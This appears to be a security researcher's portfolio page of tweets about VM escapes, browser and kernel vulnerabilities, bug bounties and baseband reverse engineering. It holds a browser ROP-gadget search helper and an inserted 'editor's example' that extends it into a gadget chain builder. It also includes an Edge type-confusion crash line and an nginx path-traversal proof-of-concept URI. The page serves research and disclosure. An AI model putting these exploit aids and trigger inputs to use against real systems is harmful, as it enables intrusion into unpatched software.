My Work
Got my 1st VM escape vulns in @Oracle VirtualBox, via unprivileged guest to hypervisor on the host. A little late for #pwn2own... Still a personal record: one month from zero (knowledge about the target) to zero (day). VirtualBox is nice and well-designed, I enjoyed looking at it pic.twitter.com/DldVJAs6CA
Dynamic ROP chain builder for browsers:

    Uint8Array.prototype.rop = function(t) {
      // t: byte pattern to search for; undefined entries are wildcards.
      // d(r, o, p): findIndex callback, r = current byte, o = its offset, p = the array.
      function d(r, o, p) {
        if (r != t[0]) return 0;               // quick reject on the first byte
        for (let q = 0; q < t.length; q++) {
          if (undefined == t[q]) continue;     // wildcard byte, matches anything
          if (p[o + q] != t[q]) return 0;
        }
        return 1;
      }
      return this.findIndex(d);                // offset of the first match, or -1
    };
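A generalized version of the pattern search in the tweet above, added here as an editor's example (it is not the author's code). It keeps the same idea, a byte pattern with `undefined` as a wildcard scanned over a `Uint8Array`, but also accepts a wildcard in the first position, returns every match instead of only the first, and resolves a list of named gadgets into absolute addresses against an assumed load base. The code bytes, gadget list and base address are constructed for illustration.

```javascript
// Added example (editor's code, not the author's): a generalized form of the
// tweet's Uint8Array.prototype.rop helper. `undefined` in a pattern marks a
// wildcard byte, wildcards may appear at any position (including the first
// byte), every match is reported, and chosen offsets are turned into absolute
// addresses given an assumed module base. Buffer, patterns and base are
// constructed sample data.

// Return every offset in `bytes` at which `pattern` matches.
function findPattern(bytes, pattern) {
  const hits = [];
  for (let i = 0; i + pattern.length <= bytes.length; i++) {
    let ok = true;
    for (let q = 0; q < pattern.length; q++) {
      if (pattern[q] === undefined) continue;                 // wildcard byte
      if (bytes[i + q] !== pattern[q]) { ok = false; break; }
    }
    if (ok) hits.push(i);
  }
  return hits;
}

// First matching offset or -1 (the findIndex semantics of the original helper).
function findFirst(bytes, pattern) {
  const hits = findPattern(bytes, pattern);
  return hits.length ? hits[0] : -1;
}

// Resolve named gadget patterns against a buffer and a load base.
// Throws if any gadget is missing, so a chain is never built with a hole in it.
function buildChain(bytes, base, gadgets) {
  return gadgets.map(({ name, pattern }) => {
    const off = findFirst(bytes, pattern);
    if (off < 0) throw new Error(`gadget not found: ${name}`);
    return base + off;
  });
}

// Constructed stand-in for a 32-bit x86 code section: a prologue followed by
// a few ret-terminated gadgets.
const SAMPLE_TEXT = Uint8Array.from([
  0x55, 0x8b, 0xec,        // 0:  push ebp; mov ebp, esp
  0x58, 0xc3,              // 3:  pop eax; ret
  0x90,                    // 5:  nop
  0x83, 0xc4, 0x10, 0xc3,  // 6:  add esp, 0x10; ret
  0x94, 0xc3,              // 10: xchg eax, esp; ret
  0x59, 0xc3,              // 12: pop ecx; ret
  0x8b, 0x00, 0xc3,        // 14: mov eax, [eax]; ret
]);

// Gadget patterns; the imm8 of `add esp, imm8` is a wildcard so any
// stack-adjust gadget of that shape would be accepted.
const GADGETS = [
  { name: 'pop eax; ret',        pattern: [0x58, 0xc3] },
  { name: 'add esp, imm8; ret',  pattern: [0x83, 0xc4, undefined, 0xc3] },
  { name: 'xchg eax, esp; ret',  pattern: [0x94, 0xc3] },
  { name: 'pop ecx; ret',        pattern: [0x59, 0xc3] },
  { name: 'mov eax, [eax]; ret', pattern: [0x8b, 0x00, 0xc3] },
];

const ASSUMED_BASE = 0x10000000;   // hypothetical module load address

// Build the chain and render each address as hex for inspection.
function demo() {
  return buildChain(SAMPLE_TEXT, ASSUMED_BASE, GADGETS)
    .map(a => '0x' + a.toString(16).padStart(8, '0'));
}
```

The scan is linear in the buffer size and is meant to run over a code section already leaked or mapped into a typed array; in a real exploit the base would come from an info-leak rather than a constant, and the 32-bit arithmetic above would need BigInt for 64-bit targets.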
New challenge solved: HackSys Extreme Vulnerable Driver Uninitialized Heap Variable Challenge :) @HackSysTeam pic.twitter.com/8cPCyO4O3L
E̶x̶p̶l̶o̶i̶t̶i̶n̶g̶ Self-patching Microsoft XML with misalignments and factorials http://www.phrack.org/papers/self-patching-msxml.html
Proof of exploitable for the recent IE11/Edge googl0day vulnerability, which lay unpatched in general public for 2 weeks: pic.twitter.com/JaLQgmnTZD
Extremely bored in my lonesome hideaway. Here is a matrix of IE11 memory bytes disclosed via the image pixels 0day pic.twitter.com/DHeGAiVZ4F
Sometimes a DEP violation is just a DEP violation... Even though the full stack is bananas. #0dayfailaday pic.twitter.com/oPY0LziwON
Kernel's own win32k.sys! xxxRealDrawMenuItem() patched in April MS16-039 - I think this is actually cve-2016-0143: pic.twitter.com/a9NMyfi7bJ
The Windows Shell CVE-2015-2515 (MS15-109) is definitely a use-after-free. /cc @80vul @opexxx @Laughing_Mantis pic.twitter.com/2QtgmweEEn
observe the call stack 0_o (cve-2015-2515) pic.twitter.com/PzSLQbR6AR
[3/3] This exploit has nearly torn my brains apart. I wish I had stuck to the malware analysis lounge. #bugarium pic.twitter.com/Gtq2gFl4OZ
w00t #cve-2013-0007 #bugarium pic.twitter.com/aZtzLEIAAR
The strange case of #cve-2013-0007… pic.twitter.com/AmrS7MT3VL
Having fun with an old but fun #cve-2013-0007 (msxml rce): pic.twitter.com/j9IYDW2G14
I just logged into internet banking to sign the payroll payment orders. Stack overflow in BSS Internet Client #bugarium pic.twitter.com/2nQYUsSlvb
Double-dip exploitable: two distinct heap UAFs / two pieces of software / one trigger #bugarium pic.twitter.com/1Cg8PLNbtO
One thing I miss from my fuzzers is black coffee added to their morning delivery: still a human is required for this pic.twitter.com/rbVDkSISgs
Once in a lifetime you see this for the first time… STATUS_BUFFER_OVERRUN #bugarium pic.twitter.com/YpEW6VIGpj
Another beautiful bug. Run, baby: pic.twitter.com/9APq0HCQQv
Poor thing windbg, it just didn't expect a windows programmer to reset the locals stack pointer in the ebp register: pic.twitter.com/yi6hhcsw0p
You know it's time to take a break from bughunting when useful software starts to fail at your glance to ASCII EIPs: pic.twitter.com/V6JyQYsqAl
A bug hunter's Lucky Clover, in the wild: pic.twitter.com/O8zclLh2cx
Did you know that SoftIce still works on XP SP3? I am such a snob. #debugging pic.twitter.com/jbFtZtO
Note: it’s not even a fraction of my actual work - e.g. it does not include malware analysis from prev years, full stack DFIR, pentest, entrepreneurship, nonprofit, community management, and building a hackerspace from scratch. I have no idea where I am going with all that knowledge
I could compose a dozen sad puns on the role of type confusions in my life. Let’s just say that browser was wrong... again

    window.__lookupGetter__('event').call(0x42424242 >> 1); // crashes more nicely on x86

Microsoft Edge CVE-2018-0893 (March 2018)
Found a little vuln in Chrome recently. Nothing super fancy, just an uninitialized variable in ANGLE via unchecked API call to Microsoft DirectX, which can (in theory) be leveraged into a memory disclosure in the GPU process. The bug was just derestricted: https://bugs.chromium.org/p/chromium/issues/detail?id=825503
Guys from the Zero Day Initiative wrote a blog post about the simpler kind of bugs in Oracle VirtualBox, including those discovered by myself (hey, thanks for sparing me a write-up!). Most importantly, they dropped a working PoC.
Go ahead, it’s easy -> https://www.zerodayinitiative.com/blog/2018/8/28/virtualbox-3d-acceleration-an-accelerated-attack-surface
Was awarded my 1st ‘top tier’ security bounty from Microsoft recently ($15k for a single vuln) via Edge WIP bounty program. Not a big deal, ofc - just a conveniently objectivized milestone for an independent white hacker’s career. Try it -> https://technet.microsoft.com/en-us/dn972323.aspx pic.twitter.com/ksQGIS3nWW
Got teaser pics, too :P pic.twitter.com/d4bqmBj2vP
To be fair, Firefox team refactored the old uconv code out of the mainline branch (non ESR). Now instead of 100 SLOC of old and buggy Unicode code they have 10000000000 SLOC of old, buggy, and also third-party ICU nightmare https://twitter.com/alisaesage/status/1142071531318599680
My theoretical analysis of one of the vulns that I found in Firefox last year, CVE-2018-5144: Overflow in nsUnicodeToBIG5::GetMaxLength can create memory-safety bugs in callers https://bugzilla.mozilla.org/show_bug.cgi?id=1440926
Screen from my experiments with nginx CVE-2018-16845 pic.twitter.com/hVa1p3lEAx
Accidentally crashed aarch64-gdb while trying to take a pretty picture of a breakpoint hit in Android kernel source code pic.twitter.com/iWm8Qpk39g
Have set up Android kernel debugging with gdb and kernel patches. UART-less, no special cables required pic.twitter.com/gz9NtTh4Qk
Nginx CVE-2009-2629 proof of concept testcase

nginx.conf:
    http { ... merge_slashes off ... }

HTTP request URI:
    //%2e%2e/
Adding a picture of Hyper-V debug log (via LIS) with a bit of extra logging added by myself, to prove as much as possible that it’s not some random BSOD pic.twitter.com/khM66UEgqH
Guys are asking me to move on and find more bugs. OK. This is a zero-day vuln in Microsoft Hyper-V. Tier 1 memory corruption in Root Partition ring0. DoS only :P pic.twitter.com/bhTT4bguzU
Heads Up! Most recent versions of #NGINX — one of the most popular web servers that powers a huge portion of the Internet today — contain an unpatched remote code execution (RCE) vulnerability.
Keep an eye out for the advisory and critical patch update in the next 1-2 months. https://twitter.com/alisaesage/status/1134400428899127296
Oracle is now explicitly promoting VirtualBox 3D acceleration: https://blogs.oracle.com/scoter/oracle-vm-virtualbox-6-3d-acceleration-for-ubuntu-1804-guest << that, after multiple security researchers independently confirmed that it’s extremely insecure, and I alone have found and reported a few dozen VM escape bugs in this component last year
Btw, I checked out modern RDP internals a few weeks ago. Microsoft is currently working hard on refactoring the entire Terminal Services infrastructure https://twitter.com/alisaesage/status/1094235745429012480
Now that MS RDP aka Terminal Services is finally getting hot as an offensive research target (it’s scheduled for pwn2own for the 1st time, + recently published paper on client-side bugs), here is a little research on TS reversing that I presented in 2011: https://www.slideshare.net/mobile/alisaesage/hacking-microsoft-remote-desktop-services-for-fun-and-profit
I have reverse-engineered Qualcomm’s Linux kernel interfaces and the DIAG protocol to enable verbose logging of things such as physics variables from the radio interface, RTOS complaints, and OTA signals with PLMN from the baseband; a big deal for this crazy blackbox pic.twitter.com/J0AspSZWU7
A bit of my work from the past weeks: Qualcomm baseband debug-level diagnostic logging on production mobiles pic.twitter.com/7l0Es0DmrN
Received my first Award of 2019: ZDI Silver. Who else, girls? (: pic.twitter.com/cT964iJVWt
Achievement unlocked: compiled a large piece of open source software that I use in my nightly work pic.twitter.com/M3UJUKXAwe
Accidentally stumbled upon an (almost°) perfect storage box for my offline calc-popping scraps
° it can’t hex pic.twitter.com/ierx62oJ3Z
Did they forget a DCOM/RPC endpoint?
I have reverse-engineered @VMWare's patch for the vuln in VMWare ESXi that was exploited at @GeekPwn 2018 to take it down for the first time. It's an uninitialized stack variable usage RCE in the host-side code of the vmxnet3 network adapter. Binary diff via Workstation 15.0.0/15.0.1 pic.twitter.com/3JgMojFlbu
Getting back to one of the less boring projects of mine. Can you recognize the ISA without referring elsewhere? pic.twitter.com/kCZ520v3Ck